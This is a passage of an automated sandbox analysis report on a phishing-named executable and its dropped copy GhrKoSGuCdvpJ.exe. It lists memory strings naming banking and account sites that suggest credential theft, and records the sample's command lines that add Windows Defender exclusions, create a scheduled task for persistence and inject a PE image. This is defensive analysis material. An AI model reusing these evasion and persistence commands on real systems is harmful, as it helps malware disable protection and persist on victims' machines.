Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.00000000040B3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3733140235.0000000000E17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3733760891.0000000001546000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1278452695.0000000000619000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Code function: 11_2_06929328 LdrInitializeThunk,

11_2_06929328

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory written: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory written: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
